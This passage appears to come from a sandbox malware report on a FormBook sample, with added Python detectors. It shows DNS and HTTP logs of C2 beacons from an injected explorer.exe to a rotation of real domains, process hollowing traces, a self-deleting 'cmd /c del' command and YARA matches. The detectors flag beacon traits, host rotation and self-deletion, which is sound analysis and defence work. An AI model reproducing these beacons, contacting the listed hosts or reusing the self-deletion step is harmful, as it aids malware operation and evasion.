Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 34.255.33.146 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 54.155.1.52 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 34.251.97.14 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 52.212.183.103 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 34.246.78.149 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 34.242.133.169 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:16:00.653287888 CEST | 8.8.8.8 | 192.168.2.4 | 0x299c | No error (0) | www.fbgroupsmadesimple.com | fbgroupsmadesimple.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 13:16:00.653287888 CEST | 8.8.8.8 | 192.168.2.4 | 0x299c | No error (0) | fbgroupsmadesimple.com | | 184.168.131.241 | A (IP address) | IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.boicity.com
                                                        • www.sh-zzjy.com
                                                        • www.zrcezzfdfkyjlir.com
                                                        • www.iafzal.com
                                                        • www.nirvananaturalcbd.net
                                                        • www.updates-app.com
                                                        • www.fbgroupsmadesimple.com

                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49763 | 156.241.53.21 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 13:15:27.482441902 CEST | 6096 | OUT | GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.boicity.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Jul 22, 2021 13:15:47.860467911 CEST | 6118 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 22 Jul 2021 11:15:27 GMT
                                                        Server: Apache
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Connection: close
                                                        Set-Cookie: PHPSESSID=oii5c43eppespmfquijqnko7b4; path=/
                                                        Upgrade: h2
                                                        Connection: Upgrade
                                                        Content-Length: 0
                                                        Content-Type: text/html; charset=gbk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49766 | 156.241.53.248 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 13:15:33.302323103 CEST | 6110 | OUT | GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.sh-zzjy.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Jul 22, 2021 13:15:34.220505953 CEST | 6111 | IN | HTTP/1.1 302 Moved Temporarily
                                                        Date: Thu, 22 Jul 2021 11:15:33 GMT
                                                        Server: Apache
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Set-Cookie: PHPSESSID=h4aj6vnqf4735he6qq4lbomgl0; path=/
                                                        Upgrade: h2
                                                        Connection: Upgrade, close
                                                        Location: /
                                                        Content-Length: 0
                                                        Content-Type: text/html; charset=gbk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49767 | 199.34.228.66 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 13:15:39.181869030 CEST | 6112 | OUT | GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.zrcezzfdfkyjlir.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Jul 22, 2021 13:15:39.378952026 CEST | 6113 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 22 Jul 2021 11:15:39 GMT
                                                        Server: Apache
                                                        Set-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.com
                                                        Vary: X-W-SSL,User-Agent
                                                        Set-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/
                                                        Cache-Control: private
                                                        X-Host: pages3.sf2p.intern.weebly.net
                                                        X-UA-Compatible: IE=edge,chrome=1
                                                        Content-Length: 3802
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><script src="/gdpr/gdprscript.js?buildTime=1626451745"></script><title>404 - Page Not Found</title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noarchive" /><link rel="shortcut icon" href="//cdn1.editmysite.com/developer/none.ico" /><style type="text/css">@font-face {font-family: 'Proxima Nova';font-weight: 300;src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot");src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot?#iefix") format("embedded-opentype"), url("//cdn2.editmysite.com/components/ui-framew


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49768 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 13:15:44.676069021 CEST | 6117 | OUT | GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.iafzal.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Jul 22, 2021 13:15:44.885785103 CEST | 6118 | IN | HTTP/1.1 302 Found
                                                        Server: nginx/1.16.1
                                                        Date: Thu, 22 Jul 2021 11:15:44 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://afternic.com/forsale/iafzal.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49769 | 104.143.9.211 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 13:15:50.171391964 CEST | 6120 | OUT | GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.nirvananaturalcbd.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Jul 22, 2021 13:15:50.310985088 CEST | 6121 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 22 Jul 2021 11:15:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ==
                                                        Data Ascii: 319<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ=="><head><title>nirvananaturalcbd.net at Directnic</title><style>html, body, iframe {margin:0;padding:0;border:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;}html, div {height:100%;}body{line-height:1.5;height:100%;}</style></head><body><div id="partner" ></div><script type="text/javascript" language="JavaScript" src="http://050005.voodoo.com/js/partner.js"></script></body></html>0


Session ID: 5
Source IP: 192.168.2.4
Source Port: 49770
Destination IP: 46.137.146.55
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Jul 22, 2021 13:15:55.499026060 CEST
kBytes transferred: 6122
Direction: OUT
Data: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.updates-app.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Timestamp: Jul 22, 2021 13:15:55.577905893 CEST
kBytes transferred: 6123
Direction: IN
Data: HTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Server: gunicorn/20.0.4
                                                        Date: Thu, 22 Jul 2021 11:15:55 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 0
                                                        Vary: Accept-Language, Origin
                                                        Content-Language: es-es
                                                        X-Protected-By: Sqreen
                                                        Via: 1.1 vegur


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49771
Destination IP: 184.168.131.241
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Jul 22, 2021 13:16:00.847594023 CEST
kBytes transferred: 6124
Direction: OUT
Data: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.fbgroupsmadesimple.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Timestamp: Jul 22, 2021 13:16:01.085139990 CEST
kBytes transferred: 6124
Direction: IN
Data: HTTP/1.1 302 Found
                                                        Server: nginx/1.16.1
                                                        Date: Thu, 22 Jul 2021 11:16:01 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://afternic.com/forsale/fbgroupsmadesimple.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
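The two sessions above are FormBook's C2 check-in as seen from the injected explorer.exe: the same path token (/4nn8/) and the same second query parameter (kXL=IR8x3xdhtDZDo) are sent to one candidate domain after another, only the first parameter changes, there is no User-Agent, the connection is closed after each request and, as the Data Raw lines show, seven NUL bytes follow the headers. Neither domain answered like a live C2: www.updates-app.com redirected to HTTPS and www.fbgroupsmadesimple.com redirected to an afternic.com for-sale page, which is what decoy or dead entries in FormBook's domain list look like in a capture. The Python below is an added example, not part of the Joe Sandbox report, that parses raw requests and flags those traits and the host rotation. The first two sample requests are copied from the report; the third is a constructed benign request used as a negative control; the short-token path regex and the two-parameter check are heuristics assumed here, not a published FormBook signature.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed input: the two beacons are copied from the report above (they
# left explorer.exe for www.updates-app.com and www.fbgroupsmadesimple.com);
# the third request is a made-up benign one used as a negative control.
SAMPLE_REQUESTS = [
    b"GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi"
    b"&kXL=IR8x3xdhtDZDo HTTP/1.1\r\nHost: www.updates-app.com\r\nConnection: close\r\n\r\n"
    + b"\x00" * 7,
    b"GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K"
    b"&kXL=IR8x3xdhtDZDo HTTP/1.1\r\nHost: www.fbgroupsmadesimple.com\r\nConnection: close\r\n\r\n"
    + b"\x00" * 7,
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
]

REQ_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]$")


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, query, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    m = REQ_LINE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    method, target = m.group(1).decode(), m.group(2).decode()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "headers": headers,
        "body": body,
    }


def beacon_indicators(req):
    """Return the FormBook-style traits a single request exhibits."""
    hits = []
    if "user-agent" not in req["headers"]:
        hits.append("no User-Agent")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("Connection: close")
    # A GET carries no body; a run of NUL bytes after the headers is the
    # oddity visible in the report's Data Raw lines.
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {0}:
        hits.append("GET with %d NUL bytes after headers" % len(req["body"]))
    # Heuristic (assumption): one short alphanumeric path token and a query
    # of exactly two parameters, as in /4nn8/?Hdydvr=...&kXL=...
    if re.fullmatch(r"/[A-Za-z0-9]{3,6}/", req["path"]) and len(req["query"]) == 2:
        hits.append("short-token path with two-parameter query")
    return hits


def c2_rotation(reqs):
    """Group requests by (path, second query parameter) and report groups that
    span more than one Host: the bot walks its domain list with a fixed path
    and bot-id parameter while only the first (payload) parameter changes."""
    groups = defaultdict(set)
    for r in reqs:
        q = list(r["query"].items())
        if len(q) == 2:
            groups[(r["path"], q[1])].add(r["headers"].get("host", ""))
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for p in parsed:
        print(p["headers"].get("host"), beacon_indicators(p))
    print(c2_rotation(parsed))
```

Run against a proxy or sandbox PCAP export, the rotation check is the more robust of the two: a single beacon can be made to look like a browser request, but the fixed path and bot-id across several unrelated hosts within seconds is hard to hide.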


Behavior

                                                        System Behavior

                                                        General

Start time: 13:13:53
Start date: 22/07/2021
Path: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
Imagebase: 0x100000
File size: 714240 bytes
MD5 hash: F03BF8D3ECC2AE4B40F836C59AC09BDF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

                                                        General

Start time: 13:14:21
Start date: 22/07/2021
Path: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
Imagebase: 0x490000
File size: 714240 bytes
MD5 hash: F03BF8D3ECC2AE4B40F836C59AC09BDF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                        General

Start time: 13:14:23
Start date: 22/07/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                        General

Start time: 13:14:52
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase: 0xbb0000
File size: 32768 bytes
MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                                        General

Start time: 13:14:57
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                        General

Start time: 13:14:57
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
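Read top to bottom, the process list is the footprint a FormBook loader leaves behind: the .NET dropper starts a second copy of itself at 13:14:21 that the sandbox no longer identifies as .NET and that carries FormBook Yara hits in memory (the hollowed copy), the payload then runs inside explorer.exe, which is the process that originated the HTTP sessions above, NETSTAT.EXE is spawned and also carries FormBook in memory, and cmd.exe /c del removes the original file at 13:14:57. The Python below is an added example, not part of the Joe Sandbox report, that turns these observations into three checks over process and session records copied from the tables above: self-deletion through cmd.exe, the same image launched twice with a change in attributed language, and web sessions from a process that is not expected to speak HTTP. The report does not list parent process IDs, so the checks deliberately do not rely on them; the allow-list of HTTP-capable processes is an assumption for illustration.

```python
import re

# Constructed input: process starts and network sessions copied from the
# report tables above (times are the report's local start times; "lang" is
# the sandbox's "Programmed in" attribution, reduced to two values).
PROCESSES = [
    {"start": "13:13:53", "path": r"C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe",
     "cmdline": r"'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'", "lang": ".NET"},
    {"start": "13:14:21", "path": r"C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe",
     "cmdline": r"C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe", "lang": "native"},
    {"start": "13:14:23", "path": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE", "lang": "native"},
    {"start": "13:14:52", "path": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "cmdline": r"C:\Windows\SysWOW64\NETSTAT.EXE", "lang": "native"},
    {"start": "13:14:57", "path": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'", "lang": "native"},
    {"start": "13:14:57", "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "lang": "native"},
]
SESSIONS = [
    {"id": 5, "dst": "46.137.146.55", "dport": 80, "process": r"C:\Windows\explorer.exe"},
    {"id": 6, "dst": "184.168.131.241", "dport": 80, "process": r"C:\Windows\explorer.exe"},
]

# Matches `/c del <file>` with or without single or double quotes around the file.
DEL_RE = re.compile(r"""/c\s+del\s+["']?([^"']+?)["']?\s*$""", re.IGNORECASE)


def self_deletions(procs):
    """cmd.exe /c del <file> where <file> is the image of an earlier process.
    The loader removes its own dropper this way once the payload is running
    inside another process."""
    first_seen, alerts = {}, []
    for p in procs:
        if p["path"].lower().endswith(r"\cmd.exe"):
            m = DEL_RE.search(p["cmdline"])
            if m and m.group(1).lower() in first_seen:
                alerts.append({"deleted": m.group(1),
                               "first_seen": first_seen[m.group(1).lower()],
                               "at": p["start"]})
        first_seen.setdefault(p["path"].lower(), p["start"])
    return alerts


def relaunched_images(procs):
    """Images started more than once, with the language attributed to each run.
    A .NET run followed by a native run of the same file is what a loader that
    spawns a suspended copy of itself and replaces its memory looks like."""
    runs = {}
    for p in procs:
        runs.setdefault(p["path"].lower(), []).append(p["lang"])
    return {path: langs for path, langs in runs.items() if len(langs) > 1}


# Assumption for illustration: processes that legitimately originate HTTP in
# this environment.  Tune per site; explorer.exe is deliberately absent.
HTTP_CAPABLE = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "svchost.exe"}


def unexpected_network(sessions, allowed=HTTP_CAPABLE):
    """Sessions to web ports whose originating process is not on the allow-list."""
    return [s for s in sessions
            if s["dport"] in (80, 443)
            and s["process"].rsplit("\\", 1)[-1].lower() not in allowed]


if __name__ == "__main__":
    print(self_deletions(PROCESSES))
    print(relaunched_images(PROCESSES))
    print([s["id"] for s in unexpected_network(SESSIONS)])
```

None of the three checks is conclusive on its own (installers delete themselves, updaters relaunch, and some environments let explorer.exe reach the web), but all three firing within a minute for the same image, together with the Yara hits in NETSTAT.EXE, is the combination that justifies treating the host as compromised rather than just the file.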
